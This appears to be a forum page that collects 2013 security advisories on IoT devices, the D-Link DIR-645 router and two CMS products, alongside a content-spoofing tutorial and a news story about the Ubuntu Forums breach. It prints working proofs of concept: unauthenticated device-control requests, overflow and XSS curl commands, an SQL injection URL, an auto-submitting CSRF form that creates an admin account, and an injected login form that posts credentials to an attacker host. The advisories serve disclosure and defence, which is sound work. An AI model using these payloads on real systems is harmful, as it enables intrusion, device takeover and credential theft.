http://savagejen.github.io/blog/2013/04/28/python-module-hijacking/ About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ________________________________ This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.

Description : Radio Thermostat of America, Inc products CT80 and CT50 versions 1.4.64 and prior fail to authenticate any access to their API. Author : Dan Crowley Source : Radio Thermostat Of America, Inc Lack Of Authentication ? Packet Storm Code : Trustwave SpiderLabs Security Advisory TWSL2013-022: No Authentication Vulnerability in Radio Thermostat of America, Inc Published: 08/01/13 Version: 1.0 Vendor: Radio Thermostat of America, Inc Product: CT80, CT50 Version affected: v1.4.64 and earlier Product description: The Radio Thermostat CT80 and CT50 are thermostats which can be controlled via WiFi. Finding 1: No Authentication *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4860 CWE: CWE-287 Improper Authentication When on the same network as a Radio Thermostat unit, no authentication is required to use any part of the API. Users on the same subnet as the unit can query and change various settings such as the operation mode, wifi connection settings, and temperature thresholds. Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Revision History: 06/19/13 - Attempt to contact vendor 07/10/13 - Attempt to contact vendor 07/12/13 - Attempt to contact vendor 07/19/13 - Attempt to contact vendor 08/01/13 - Advisory published References 1. http://www.radiothermostat.com About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ________________________________ This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.

Description : INSTEON Hub version 2242-222, a home automation controller for INSTEON and X10 compatible devices, fails to authenticate access to various APIs. Author : David Bryan Source : INSTEON Hub 2242-222 Lack Of Authentication ? Packet Storm Code : Trustwave SpiderLabs Security Advisory TWSL2013-023: Lack of Web and API Authentication Vulnerability in INSTEON Hub Published: 8/01/13 Version: 1.0 Vendor: INSTEON (http://www.INSTEON.com/) Product: Hub Version affected: 2242-222 (model discontinued) Product description: Home automation controller for INSTEON and X10 compatible devices such as, lights, RF deadbolts/door locks, Window/door sensors, thermostats, etc. Finding 1: Lack of Web and API Authentication *****Credit: David Bryan of Trustwave SpiderLabs CVE: CVE-2013-4859 CWE: CWE-306 The INSTEON Hub allows users to control their home automation devices from their home, and across the Internet. To allow control of the devices from the Internet requires that a user create a port forward from the Internet to the Hub on their home network. This is to allow direct access from a users smart phone. The hub will display a web page that is a legacy of their previous hardware version of home automation control systems. This page allows anonymous access to control any devices connected to the Hub, if the user has not set a user name and password. Additionally it reveals the name of the device, and what city and timezone the device is located. Because INSTEON does not restrict the user in the naming of their device, it is possible for users to use their street address in the naming. Having access to the name of the city, make locating the device trivial using mapping software to search for the house and street name of the controller, and potentially identify the location of the device. The web interface does not require the user to set authentication or authorization to make requests to the Hub. This allows an anonymous threat agent access to turn on and off lights/devices, change temperature settings on thermostats, or even open electronic door locks. Additionally a threat agent also has access to a buffer command, where they can see what lights or devices were turned on or off. For example, an ON Command is a simple GET request of: http://A.B.C.D:8001/3?0262XXYYZZ0F11FF=I=3 This turns on the device, and does not require authentication to perform this action. XXYYZZ is the ID of the INSTEON device. An OFF Command is a simple GET request of: http://A.B.C.D:8001/3?0262XXYYZZ0F1100=I=3 This turns the device off, and does not require authentication to perform this action. http://A.B.C.D:8001/buffstatus.xml request, without any sort of authentication taking place: <response><BS>02622026AA0F11FF0602502026AA1E965F2F11FF000000000000000000000000000000000000000000000000000000000000</BS></response> >From that response,it is possible to gather what INSTEON devices that were last used. >From there an attacker can then go back and easily decode the buffer status message and turn those devices on or off. Additionally, the device does not have the capability to enable SSL/TLS to encrypt the data in transit. This allows any anonymous threat agent to view, intercept, and replay commands. It also does not prevent someone from capturing authentication credentials when the device is accessed via the Internet. Remediation Steps: The vendor has recalled and discontinued affected units. Trustwave SpiderLabs has confirmed that Model 2422-222R is not affected by this vulnerability. Vendor Communication Timeline: 12/27/12 - Vulnerability disclosed to vendor 03/16/13 - Vendor emails upgrade notice 07/17/13 - Advisory disclosed to vendor 08/01/13 - Advisory published References 1. http://www.INSTEON.com/support.html About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ________________________________ This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.

Description : D-Link DIR-645 devices suffer from buffer overflow and cross site scripting vulnerabilities. Author : Roberto Paleari Source : D-Link DIR-645 Buffer Overflow / Cross Site Scripting ? Packet Storm Code : Multiple vulnerabilities on D-Link DIR-645 devices ================================================== [ADVISORY INFORMATION] Title: Multiple vulnerabilities on D-Link DIR-645 devices Discovery date: 06/03/2013 Release date: 02/08/2013 Advisory URL: http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt Credits: Roberto Paleari (roberto@greyhats.it, twitter: @rpaleari) [AFFECTED PRODUCTS] This security vulnerability affects the following products and firmware versions: * D-Link DIR-645, 1.03B08 Other products and firmware versions could also be vulnerable, but they were not checked. [VULNERABILITY DETAILS] This router model is affected by multiple security vulnerabilities. All of them are exploitable by remote, unauthenticated attackers. Details are outlined in the following, including some proof-of-concepts. 1. Buffer overflow on "post_login.xml" Invoking the "post_login.xml" server-side script, attackers can specify a "hash" password value that is used to authenticate the user. This hash value is eventually processed by the "/usr/sbin/widget" local binary. However, the latter copies the user-controlled hash into a statically-allocated buffer, allowing attackers to overwrite adjacent memory locations. As a proof-of-concept, the following URL allows attackers to control the return value saved on the stack (the vulnerability is triggered when executing "/usr/sbin/widget"): curl http://<target ip>/post_login.xml?hash=AAA...AAABBBB The value of the "hash" HTTP GET parameter consists in 292 occurrences of the 'A' character, followed by four occurrences of character 'B'. In our lab setup, characters 'B' overwrite the saved program counter (%ra). 2. Buffer overflow on "hedwig.cgi" Another buffer overflow affects the "hedwig.cgi" CGI script. Unauthenticated remote attackers can invoke this CGI with an overly-long cookie value that can overflow a program buffer and overwrite the saved program address. Proof-of-concept: curl -b uid=$(perl -e 'print "A"x1400;') -d 'test' http://<target ip>/hedwig.cgi 3. Buffer overflow on "authentication.cgi" The third buffer overflow vulnerability affects the "authentication.cgi" CGI script. This time the issue affects the HTTP POST paramter named "password". Again, this vulnerability can be abused to achieve remote code execution. As for all the previous issues, no authentication is required. Proof-of-concept: curl -b uid=test -d $(perl -e 'print "uid=test&password=asd" . "A"x2024;') http://<target ip>/authentication.cgi 4. Cross-site scripting on "bind.php" Proof-of-concept: curl "http://<target ip>/parentalcontrols/bind.php?deviceid=test'\"/><script>alert(1)</script><" 5. Cross-site scripting on "info.php" Proof-of-concept: curl "http://<target ip>/info.php?RESULT=testme\", msgArray); alert(1); //" 6. Cross-site scripting on "bsc_sms_send.php" Proof-of-concept: curl "http://<target ip>/bsc_sms_send.php?receiver=testme\"/><script>alert(1);</script><div" [REMEDIATION] D-Link has released an updated firmware version (1.04) that addresses this issue. The firmware is already available on D-Link web site, at the following URL: http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000 [DISCLAIMER] The author is not responsible for the misuse of the information provided in this security advisory. The advisory is a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.

Description : Telmanik CMS Press version 1.01b suffers from a remote SQL injection vulnerability in pages.php. Author : Anarchy Angel Source : Telmanik CMS Press 1.01b SQL Injection ? Packet Storm Code : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [x] Type: SQL Injection [x] Vendor: www.telmanik.com [x] Script Name: Telmanik CMS Press [x] Script Version: 1.01b [x] Script DL: http://www.telmanik.com/download/Telmanik_CMS_Press/1.01_beta/telmanik_cms_press_v1.01_beta.zip [x] Author: Anarchy Angel [x] Mail : anarchy[at]dc414[dot]org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Exploit: http://site.org/themes/pages.php?page_name=[SQLi] you have to formate you injection like so: union_select_row_from_table Replacing spaces with ?_?. Ex: http://site.org/themes/pages.php?page_name=union_select_password_from_members This is a special DefCon 21 kick off from me! See ya there [image: ] Special Tnx : dc414, lun0s, proge, sToRm, progenic, gny

Description : Rite CMS version 1.0.0 suffers from cross site request forgery and cross site scripting vulnerabilities. Author : Yashar shahinzadeh Source : Rite CMS 1.0.0 Cross Site Request Forgery / Cross Site Scripting ? Packet Storm Code : ########################################################################################### # Exploit Title: RiteCMS multiple vulnerabilities # Date: 2013 30 July # Exploit Author: Yashar shahinzadeh # Credit goes for: ha.cker.ir # Vendor Homepage: http://ritecms.com/ # Tested on: Linux & Windows, PHP 5.2.9 # Affected Version : 1.0.0 # # Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir } ########################################################################################### Summary: ======== 1. CSRF - Change administrator's password 2. Cross site scripting 1. CSRF - Adding an admin account: ================================== <html> <body onload="submitForm()"> <form name="myForm" id="myForm" action="http://[Path to RiteCMS]/cms/index.php" method="post"> <input type="hidden" name="mode" value="users"> <input type="hidden" name="id" value="1"> <input type="hidden" name="name" value="admin1"> <input type="hidden" name="new_pw" value="admin"> <input type="hidden" name="new_pw_r" value="admin"> <input type="hidden" name="type" value="1"> <input type="hidden" name="edit_user_submitted" value="%C2%A0OK%C2%A0"> </form> <script type='text/javascript'>document.myForm.submit();</script> </html> 2. Cross site scripting (After auth): ===================================== http://localhost:80//ritecms.1.0.0.tinymce/cms/index.php?mode=[XSS]

According to WhiteHat Security’s annual study of about 15,000 websites, 86% had at least one serious hole that hackers could exploit, and content spoofing is one such prevalent vulnerability, identified in over half of the sites. The top 15 vulnerability classes for websites are said to be information leakage, XSS (cross site scripting), SQL injection, CSRF (cross site request forgery), brute force, content spoofing, insufficient transport layer protection, insufficient authorization, fingerprinting, session fixation, URL redirection, direction indexing, abuse of functionality, predictable resource location, and finally, response splitting. Content spoofing is a type of exploit used by a malicious attacker to present a fake or modified website to the victim as if it were legitimate. Content spoofing often exploits an established trust relationship between a user of the web service and an organization. The intent is typically to defraud victims, although sometimes the actual purpose may be to simply misrepresent the origination or an individual. This technique is also referred to as content injection or virtual defacement, according to the OWASP group. This attack is generally used as, or in conjunction with, social engineering (e.g., via e-mail or any social networking sites). This attack is developed by exploiting a code-based vulnerability and the user’s trust. In some cases, an attacker may modify information and links in an established website by alerting content on the server. The later one is more difficult to detect by a user, since there is no readily apparent difference to the casual observer. When a web application does not properly handle the data that is supplied by the user, an attacker can supply the content to the web application by modifying a parameter value, which in return is reflected back to the user of the web application. The most dangerous form of content spoofing is done with DHTML (dynamic HTML) content sources such as fill-in forms and login forms. When a web-page with spoofed content is viewed by an internet user, the URL bar displays a legitimate URL, although it isn’t. As a result, when the user of the website enters sensitive information such as username, password, birth date, credit card details, or SSN (Social Security Number), the attacker can obtain this victim’s data for identity theft or other malicious purposes. Difference between Content Spoofing and XSS According to OWASP, content spoofing is an attack that is closely related to cross site scripting (XSS). While XSS uses <script> and similar techniques to run JavaScript, content spoofing uses other techniques to modify the pages for malicious reasons. Even if XSS mitigation techniques are used within the web application, such as proper output encoding, the application can still be vulnerable to text-based spoofing attacks. Following examples Demonstrate Content-Spoofing Attacks 1.HTML (hypertext markup language) injection A possible attack scenario is demonstrated below : 1. First the attacker finds a site which is vulnerable to HTML injection. 2. The attacker sends an URL with malicious code injected in the URL to the user of the website (victim) via e-mail or some other social networking site. 3. The user visits the page because the page is located within the trusted domain. 4. When the victim accesses the page, the injected HTML code is rendered and presented to the user asking for username and password. 5. The username and password are both sent to the attacker’s server. Let’s see a small demonstration : The following PHP code contains HTML injection vulnerability via the e-mail parameter: </pre> <h1> INFOSEC INSTITUTE</h1> <form action="get"> <b>Enter your name: </b> <input type="text" name="name" /> <input type="submit" value="submit name" /> </form> <pre> This is how it looks : http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/080213_0229_ContentSpoo2.jpg Name.php <!--?php $name = $_REQUEST ['name']; ?--></pre> <h1>Welcome to Infosec Institute</h1> <pre> Hello, <!--?php echo $name; ?-->! How can we help you ? This is how it looks : Notice the URL, the name is passed to name.php via the GET parameter. Now let’s perform HTML injection in the page and create a malicious URL. The crafted URL will look like this: localhost/name.php?name=Bhavesh<form action=”http://attackers/log.php” method=”post”>Username<input type=”text” name=”user”><br>password<input type=”password” name=”pass”><input type=”submit”></form> By requesting the above link, the page renders the injected HTML code by displaying a login form. Once a victim enters the username and password, the credentials are sent to log.php on the attacker’s server via POST method. 1. Text-based injection : This is another method of content spoofing wherein the attacker displays false information to the victim. The injection is carried out in a similar fashion to HTML injection; the only difference is, instead of HTML tags, the crafted URL is created by adding or changing the actual data with a false one. A possible attack scenario is shown below: 1. The attacker identifies a vulnerable website, which gives recommendations to its users whether they should buy the stocks or not. 2. The attacker crafts the URL by slightly modifying the valid request into a malicious one. 3. The malformed page request link is sent to the user of the website via IM, email, or a social networking site. 4. A valid web page renders the injected textual content and displays false information to the victim. The valid URL looks like this : localhost/stock.php?id=1234&rec=We%20recommend%20you%20to%20buy%20these%20stocks Malformed URL will looks like this: localhost/stock.php?id=1234&rec=We%20recommend%20you%20to%20sell%20these%20stocks Notice the malformed URL. By changing the contents within the URL for the rec parameter, the output on the page is also changed. This is a serious issue, since it deals with the monetary system. Such a flaw can lead to heavy loss to the victim economically. Avoiding Such Attacks Best practices to prevent such attacks are within the programming/development phase itself. These practices include: Validation of user input for type, length, data-range, format, etc. Encoding any user input that will be output by the web application. Use of POST parameter if possible. Before deployment of any web application on the actual server, test it with web vulnerability scanners, e.g. Acunetix, etc. Practices to Be Followed by Users Don’t click on links circulated via social networking sites (SNS), IM, e-mail. Always verify that the source is legitimate. Check the URL, even though the URL seems legitimate; it may have been sent by an attacker. It is advisable to first visit the domain name of the service and then navigate to the desired page. Sursa Resources.InfosecInstitute.com

Poti sa ne faci un tutorial despre cum ai facut chestia aia ?

Ce treaba are asta cu prezentarea omului ? Sper sa fi banat idiotule.

Ma bucur ca se baga lumea sa posteze diverse chestii pe alte forumuri insa nu si pe Romanian Security Center.Bineinteles aici nimeni nu va da bani so..

De la ce vine nickname-ul WinKODE ?

Foarte tare ideea hackerului, imi place cum a gandit si cum a jucat.

Ubuntu Forums are back to normal following a serious hack attack that exposed the usernames, email addresses and hashed passwords of 1.8 million open source users. Parent firm Canonical restored the forums on Tuesday as well as publishing a detailed summary of what went wrong and the broad steps it has taken to beef up security. Canonical blames the breach on a "combination of a compromised individual accounts and the configuration settings in vBulletin, the Forums application software". Only the forums and not the popular Ubuntu Linux distribution nor any Canonical or Ubuntu services, namely Ubuntu One and Launchpad, were affected. "We have repaired and hardened the Ubuntu Forums, and as the problematic settings are the default behaviour in vBulletin, we are working with vBulletin staff to change and/or better document these settings," a statement by Canonical on its official blog explains. The blog post goes on to give a blow-by-blow account of how the high-profile hack was carried out: Canonical's postmortem of the attack concludes that the hacker(s) would have gained full access to the Forums database. This access was used to download the "user" table which contained usernames, email addresses and salted and hashed (using MD5) passwords for 1.82 million users. The audit concludes that the hacker(s) was not able to gain any access to any other Canonical or Ubuntu services. The Ubuntu code repository and update mechanism were also beyond the reach of the hacker/s, the investigation concludes. The open-source firm admits it hasn't yet gotten to the bottom of how the attacker gained access to the moderator account used to start the attack or what type of cross-site scripting attack was subsequently brought into play. "The announcement the attacker posted was deleted by one of the Forum administrators so we don’t know exactly what XSS attack was used," it said. The initial compromise went unnoticed and it wasn't until the Ubuntu Forums were defaced on Saturday 20 July that the site was pulled offline. A Twitter user using the profile @Sputn1k_ subsequently claimed responsibility for the defacement. Sputn1k_ subsequently said he hadn't planned to crack the stolen ubuntuforums.org credentials in a statement that suggested pure devilment and perhaps a desire to expose security flaws or gain bragging rights were behind the hack. XSS (cross-site scripting) attacks are a common class of website vulnerability that allows (potentially malicious) content from a hacker-controlled site to be presented to surfers as if it came from a vulnerable site they are visiting. The ruse most often crops up in phishing attacks but it has other applications as well, as the Ubuntu Forums hack graphically illustrates. Canonical's post goes on to provide a detailed description of steps it has taken to beef up its security and defend against future attacks. The whole explanation is a model of openness and clarity that concludes with an apology about the data leak and downtime that came as a result of the breach. Although users were inconvenienced by the breach - which left them without access to the forums for a week and obliged them to change their passwords - the restoration process was designed so that no data (posts, private messages etc) would be lost during the disaster recovery process. ® Sursa TheRegister.co.uk